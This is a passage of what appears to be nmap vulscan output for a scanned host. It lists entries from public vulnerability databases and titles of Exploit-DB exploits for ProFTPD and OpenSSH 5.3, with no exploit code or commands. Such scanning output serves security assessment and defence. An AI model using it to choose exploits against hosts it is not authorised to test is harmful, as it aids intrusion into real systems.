3186| [10252] ProFTPD CIDR Access Control Rule Bypass Vulnerability
3187| [9782] ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability
3188| [8679] ProFTPD ASCII File Transfer Buffer Overrun Vulnerability
3189| [7974] ProFTPD SQL Injection mod_sql Vulnerability
3190| [6781] ProFTPD 1.2.0rc2 log_pri() Format String Vulnerability
3191| [6341] ProFTPD STAT Command Denial Of Service Vulnerability
3192| [3310] ProFTPD Client Hostname Resolving Vulnerability
3193| [2366] ProFTPD USER Remote Denial of Service Vulnerability
3194| [2185] ProFTPD SIZE Remote Denial of Service Vulnerability
3195| [812] ProFTPD mod_sqlpw Vulnerability
3196| [650] ProFTPD snprintf Vulnerability
3197| [612] ProFTPD Remote Buffer Overflow
3198|
3199| IBM X-Force - https://exchange.xforce.ibmcloud.com:
3200| [80980] ProFTPD FTP commands symlink
3201| [71226] ProFTPD pool code execution
3202| [65207] ProFTPD mod_sftp module denial of service
3203| [64495] ProFTPD sql_prepare_where() buffer overflow
3204| [63658] ProFTPD FTP server backdoor
3205| [63407] mod_sql module for ProFTPD buffer overflow
3206| [63155] ProFTPD pr_data_xfer denial of service
3207| [62909] ProFTPD mod_site_misc directory traversal
3208| [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
3209| [53936] ProFTPD mod_tls SSL certificate security bypass
3210| [48951] ProFTPD mod_sql username percent SQL injection
3211| [48558] ProFTPD NLS support SQL injection protection bypass
3212| [45274] ProFTPD URL cross-site request forgery
3213| [33733] ProFTPD Auth API security bypass
3214| [31461] ProFTPD mod_radius buffer overflow
3215| [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
3216| [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
3217| [30147] ProFTPD sreplace() buffer overflow
3218| [21530] ProFTPD mod_sql format string attack
3219| [21528] ProFTPD shutdown message format string attack
3220| [19410] GProFTPD file name format string attack
3221| [18453] ProFTPD SITE CHGRP command allows group ownership modification
3222| [17724] ProFTPD could allow an attacker to obtain valid accounts
3223| [16038] ProFTPD CIDR entry ACL bypass
3224| [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
3225| [12369] ProFTPD mod_sql SQL injection
3226| [12200] ProFTPD ASCII file newline buffer overflow
3227| [10932] ProFTPD long PASS command buffer overflow
3228| [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
3229| [7818] ProFTPD ls "
3230| [7816] ProFTPD file globbing denial of service
3231| [7126] ProFTPD fails to resolve hostnames
3232| [6433] ProFTPD format string
3233| [6209] proFTPD /var symlink
3234| [6208] ProFTPD contains configuration error in postinst script when running as root
3235| [5801] proftpd memory leak when using SIZE or USER commands
3236| [5737] ProFTPD system using mod_sqlpw unauthorized access
3237|
3238| Exploit-DB - https://www.exploit-db.com:
3239| [23170] ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability
3240| [22079] ProFTPD 1.2.x STAT Command Denial of Service Vulnerability
3241| [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
3242| [20536] ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability
3243| [19503] ProFTPD 1.2 pre6 snprintf Vulnerability
3244| [19476] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (2)
3245| [19475] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (1)
3246| [19087] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (2)
3247| [19086] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (1)
3248| [18181] FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit
3249| [16921] ProFTPD-1.3.3c Backdoor Command Execution
3250| [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
3251| [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
3252| [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
3253| [16129] ProFTPD mod_sftp Integer Overflow DoS PoC
3254| [15662] ProFTPD 1.3.3c compromised source remote root Trojan
3255| [15449] ProFTPD IAC Remote Root Exploit
3256| [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
3257| [8037] ProFTPd with mod_mysql Authentication Bypass Vulnerability
3258| [4312] ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
3259| [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
3260| [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
3261| [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
3262| [3021] ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit
3263| [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
3264| [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
3265| [581] ProFTPD <= 1.2.10 Remote Users Enumeration Exploit
3266| [394] ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl
3267| [244] ProFTPD <= 1.2.0pre10 Remote Denial of Service Exploit
3268| [241] ProFTPD 1.2.0 (rc2) - memory leakage example Exploit
3269| [110] ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit
3270| [107] ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit
3271| [43] ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
3272|
3273| OpenVAS (Nessus) - http://www.openvas.org:
3274| [900815] ProFTPD Server Remote Version Detection
3275| [900507] ProFTPD Server SQL Injection Vulnerability
3276| [900506] ProFTPD Server Version Detection
3277| [900133] ProFTPD Long Command Handling Security Vulnerability
3278| [863897] Fedora Update for proftpd FEDORA-2011-15765
3279| [863633] Fedora Update for proftpd FEDORA-2011-15741
3280| [863630] Fedora Update for proftpd FEDORA-2011-15740
3281| [862999] Fedora Update for proftpd FEDORA-2011-5040
3282| [862992] Fedora Update for proftpd FEDORA-2011-5033
3283| [862829] Fedora Update for proftpd FEDORA-2011-0613
3284| [862828] Fedora Update for proftpd FEDORA-2011-0610
3285| [862658] Fedora Update for proftpd FEDORA-2010-17091
3286| [862546] Fedora Update for proftpd FEDORA-2010-17220
3287| [862544] Fedora Update for proftpd FEDORA-2010-17098
3288| [861120] Fedora Update for proftpd FEDORA-2007-2613
3289| [831503] Mandriva Update for proftpd MDVSA-2011:181 (proftpd)
3290| [831323] Mandriva Update for proftpd MDVSA-2011:023 (proftpd)
3291| [831242] Mandriva Update for proftpd MDVSA-2010:227 (proftpd)
3292| [830311] Mandriva Update for proftpd MDKSA-2007:130 (proftpd)
3293| [830197] Mandriva Update for proftpd MDKA-2007:089 (proftpd)
3294| [801640] ProFTPD Denial of Service Vulnerability
3295| [801639] ProFTPD Multiple Remote Vulnerabilities
3296| [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
3297| [100933] ProFTPD Backdoor Unauthorized Access Vulnerability
3298| [100316] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
3299| [71967] Slackware Advisory SSA:2012-041-04 proftpd
3300| [70586] FreeBSD Ports: proftpd, proftpd-mysql
3301| [70560] Debian Security Advisory DSA 2346-2 (proftpd-dfsg)
3302| [70559] Debian Security Advisory DSA 2346-1 (proftpd-dfsg)
3303| [69584] Slackware Advisory SSA:2011-095-01 proftpd
3304| [69327] Debian Security Advisory DSA 2191-1 (proftpd-dfsg)
3305| [69322] Debian Security Advisory DSA 2185-1 (proftpd-dfsg)
3306| [68801] Slackware Advisory SSA:2010-357-02 proftpd
3307| [68702] FreeBSD Ports: proftpd
3308| [68697] FreeBSD Ports: proftpd
3309| [68466] Slackware Advisory SSA:2010-305-03 proftpd
3310| [66585] Fedora Core 11 FEDORA-2009-13236 (proftpd)
3311| [66583] Fedora Core 12 FEDORA-2009-13250 (proftpd)
3312| [66291] Fedora Core 10 FEDORA-2009-11666 (proftpd)
3313| [66290] Fedora Core 11 FEDORA-2009-11649 (proftpd)
3314| [66205] Debian Security Advisory DSA 1925-1 (proftpd-dfsg)
3315| [66091] Mandrake Security Advisory MDVSA-2009:288 (proftpd)
3316| [64966] Fedora Core 10 FEDORA-2009-9386 (proftpd)
3317| [63630] FreeBSD Ports: proftpd, proftpd-mysql
3318| [63573] Debian Security Advisory DSA 1727-1 (proftpd-dfsg)
3319| [63558] Gentoo Security Advisory GLSA 200903-27 (proftpd)
3320| [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
3321| [63128] Fedora Core 8 FEDORA-2009-0195 (proftpd)
3322| [63119] Fedora Core 10 FEDORA-2009-0089 (proftpd)
3323| [63117] Fedora Core 9 FEDORA-2009-0064 (proftpd)
3324| [63061] Debian Security Advisory DSA 1689-1 (proftpd-dfsg)
3325| [61656] FreeBSD Ports: proftpd, proftpd-mysql
3326| [58019] Gentoo Security Advisory GLSA 200702-02 (proftpd)
3327| [57939] Gentoo Security Advisory GLSA 200611-26 (proftpd)
3328| [57786] Debian Security Advisory DSA 1245-1 (proftpd)
3329| [57725] FreeBSD Ports: proftpd, proftpd-mysql
3330| [57703] Slackware Advisory SSA:2006-335-02 proftpd
3331| [57686] Debian Security Advisory DSA 1222-2 (proftpd)
3332| [57683] Debian Security Advisory DSA 1222-1 (proftpd)
3333| [57592] Debian Security Advisory DSA 1218-1 (proftpd)
3334| [57576] FreeBSD Ports: proftpd, proftpd-mysql
3335| [55234] Debian Security Advisory DSA 795-2 (proftpd)
3336| [55007] Gentoo Security Advisory GLSA 200508-02 (proftpd)
3337| [54858] Gentoo Security Advisory GLSA 200502-26 (GProFTPD)
3338| [54569] Gentoo Security Advisory GLSA 200405-09 (proftpd)
3339| [54483] FreeBSD Ports: proftpd, proftpd-mysql
3340| [53882] Slackware Advisory SSA:2003-259-02 ProFTPD Security Advisory
3341| [53794] Debian Security Advisory DSA 032-1 (proftpd)
3342| [53791] Debian Security Advisory DSA 029-1 (proftpd)
3343| [52532] FreeBSD Ports: proftpd
3344| [52464] FreeBSD Ports: proftpd
3345| [15484] proftpd < 1.2.11 remote user enumeration
3346|
3347| SecurityTracker - https://www.securitytracker.com:
3348| [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
3349| [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
3350| [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
3351| [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
3352| [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
3353| [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
3354| [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
3355| [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
3356| [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
3357| [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
3358| [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
3359| [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
3360| [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
3361| [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
3362|
3363| OSVDB - http://www.osvdb.org:
3364| [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
3365| [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
3366| [70868] ProFTPD mod_sftp Component SSH Payload DoS
3367| [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
3368| [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
3369| [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
3370| [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
3371| [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
3372| [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
3373| [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
3374| [57310] ProFTPD Multiple Unspecified Overflows
3375| [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
3376| [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
3377| [57307] ProFTPD Multiple Modules Unspecified Overflows
3378| [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
3379| [57305] ProFTPD src/main.c Unspecified Overflow
3380| [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
3381| [57303] ProFTPD modules/mod_auth.c Unspecified Issue
3382| [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
3383| [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
3384| [51849] ProFTPD Character Encoding SQL Injection
3385| [51720] ProFTPD NLST Command Argument Handling Remote Overflow
3386| [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
3387| [48411] ProFTPD FTP Command Truncation CSRF
3388| [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
3389| [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
3390| [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
3391| [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
3392| [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
3393| [23063] ProFTPD mod_radius Password Overflow DoS
3394| [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
3395| [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
3396| [18270] ProFTPD ftpshut Shutdown Message Format String
3397| [14012] GProftpd gprostats Utility Log Parser Remote Format String
3398| [10769] ProFTPD File Transfer Newline Character Overflow
3399| [10768] ProFTPD STAT Command Remote DoS
3400| [10758] ProFTPD Login Timing Account Name Enumeration
3401| [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
3402| [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
3403| [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
3404| [7166] ProFTPD SIZE Command Memory Leak Remote DoS
3405| [7165] ProFTPD USER Command Memory Leak DoS
3406| [5744] ProFTPD CIDR IP Subnet ACL Bypass
3407| [5705] ProFTPD Malformed cwd Command Format String
3408| [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
3409| [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
3410| [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
3411|_
341222/tcp open ssh OpenSSH 5.3 (protocol 2.0)
3413| vulscan: VulDB - https://vuldb.com:
3414| [80267] OpenSSH up to 5.x/6.x/7.1p1 Forward Option roaming_common.c roaming_read/roaming_write memory corruption
3415| [80266] OpenSSH up to 5.x/6.x/7.1p1 roaming_common.c resend_bytes information disclosure
3416| [4584] OpenSSH up to 5.7 auth-options.c information disclosure
3417| [4282] OpenSSH 5.6/5.7 Legacy Certificate memory corruption
3418|
3419| MITRE CVE - https://cve.mitre.org:
3420| [CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
3421| [CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
3422| [CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
3423| [CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
3424| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
3425| [CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
3426| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
3427| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
3428| [CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
3429|
3430| SecurityFocus - https://www.securityfocus.com/bid/:
3431| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
3432| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
3433| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
3434| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
3435| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
3436| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
3437| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
3438| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
3439| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
3440| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
3441| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
3442| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
3443| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
3444| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
3445| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
3446| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
3447| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
3448| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
3449| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
3450| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
3451| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
3452| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
3453| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
3454| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
3455| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
3456| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
3457| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
3458| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
3459| [75990] OpenSSH Login Handling Security Bypass Weakness
3460| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
3461| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
3462| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
3463| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
3464| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
3465| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
3466| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
3467| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
3468| [61286] OpenSSH Remote Denial of Service Vulnerability
3469| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
3470| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
3471| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
3472| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
3473| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
3474| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
3475| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
3476| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
3477| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
3478| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
3479| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
3480| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
3481| [30794] Red Hat OpenSSH Backdoor Vulnerability
3482| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
3483| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
3484| [28531] OpenSSH ForceCommand Command Execution Weakness
3485| [28444] OpenSSH X Connections Session Hijacking Vulnerability
3486| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
3487| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
3488| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
3489| [20956] OpenSSH Privilege Separation Key Signature Weakness
3490| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
3491| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
3492| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
3493| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
3494| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
3495| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
3496| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
3497| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
3498| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
3499| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
3500| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
3501| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
3502| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
3503| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
3504| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
3505| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
3506| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
3507| [6168] OpenSSH Visible Password Vulnerability
3508| [5374] OpenSSH Trojan Horse Vulnerability
3509| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
3510| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
3511| [4241] OpenSSH Channel Code Off-By-One Vulnerability
3512| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
3513| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
3514| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
3515| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
3516| [2917] OpenSSH PAM Session Evasion Vulnerability
3517| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
3518| [2356] OpenSSH Private Key Authentication Check Vulnerability
3519| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
3520| [1334] OpenSSH UseLogin Vulnerability
3521|
3522| IBM X-Force - https://exchange.xforce.ibmcloud.com:
3523| [83258] GSI-OpenSSH auth-pam.c security bypass
3524| [82781] OpenSSH time limit denial of service
3525| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
3526| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
3527| [72756] Debian openssh-server commands information disclosure
3528| [68339] OpenSSH pam_thread buffer overflow
3529| [67264] OpenSSH ssh-keysign unauthorized access
3530| [65910] OpenSSH remote_glob function denial of service
3531| [65163] OpenSSH certificate information disclosure
3532| [64387] OpenSSH J-PAKE security bypass
3533| [63337] Cisco Unified Videoconferencing OpenSSH weak security
3534| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
3535| [45202] OpenSSH signal handler denial of service
3536| [44747] RHEL OpenSSH backdoor
3537| [44280] OpenSSH PermitRootLogin information disclosure
3538| [44279] OpenSSH sshd weak security
3539| [44037] OpenSSH sshd SELinux role unauthorized access
3540| [43940] OpenSSH X11 forwarding information disclosure
3541| [41549] OpenSSH ForceCommand directive security bypass
3542| [41438] OpenSSH sshd session hijacking
3543| [40897] OpenSSH known_hosts weak security
3544| [40587] OpenSSH username weak security
3545| [37371] OpenSSH username data manipulation
3546| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
3547| [37112] RHSA update for OpenSSH signal handler race condition not installed
3548| [37107] RHSA update for OpenSSH identical block denial of service not installed
3549| [36637] OpenSSH X11 cookie privilege escalation
3550| [35167] OpenSSH packet.c newkeys[mode] denial of service
3551| [34490] OpenSSH OPIE information disclosure
3552| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
3553| [32975] Apple Mac OS X OpenSSH denial of service
3554| [32387] RHSA-2006:0738 updates for openssh not installed
3555| [32359] RHSA-2006:0697 updates for openssh not installed
3556| [32230] RHSA-2006:0298 updates for openssh not installed
3557| [32132] RHSA-2006:0044 updates for openssh not installed
3558| [30120] OpenSSH privilege separation monitor authentication verification weakness
3559| [29255] OpenSSH GSSAPI user enumeration
3560| [29254] OpenSSH signal handler race condition
3561| [29158] OpenSSH identical block denial of service
3562| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
3563| [25116] OpenSSH OpenPAM denial of service
3564| [24305] OpenSSH SCP shell expansion command execution
3565| [22665] RHSA-2005:106 updates for openssh not installed
3566| [22117] OpenSSH GSSAPI allows elevated privileges
3567| [22115] OpenSSH GatewayPorts security bypass
3568| [20930] OpenSSH sshd.c LoginGraceTime denial of service
3569| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
3570| [17213] OpenSSH allows port bouncing attacks
3571| [16323] OpenSSH scp file overwrite
3572| [13797] OpenSSH PAM information leak
3573| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
3574| [13264] OpenSSH PAM code could allow an attacker to gain access
3575| [13215] OpenSSH buffer management errors could allow an attacker to execute code
3576| [13214] OpenSSH memory vulnerabilities
3577| [13191] OpenSSH large packet buffer overflow
3578| [12196] OpenSSH could allow an attacker to bypass login restrictions
3579| [11970] OpenSSH could allow an attacker to obtain valid administrative account
3580| [11902] OpenSSH PAM support enabled information leak
3581| [9803] OpenSSH "
3582| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
3583| [9307] OpenSSH is running on the system
3584| [9169] OpenSSH "
3585| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
3586| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
3587| [8383] OpenSSH off-by-one error in channel code
3588| [7647] OpenSSH UseLogin option arbitrary code execution
3589| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
3590| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
3591| [7179] OpenSSH source IP access control bypass
3592| [6757] OpenSSH "
3593| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
3594| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
3595| [5517] OpenSSH allows unauthorized access to resources
3596| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
3597|
3598| Exploit-DB - https://www.exploit-db.com:
3599| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
3600| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
3601| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
3602| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
3603| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
3604| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
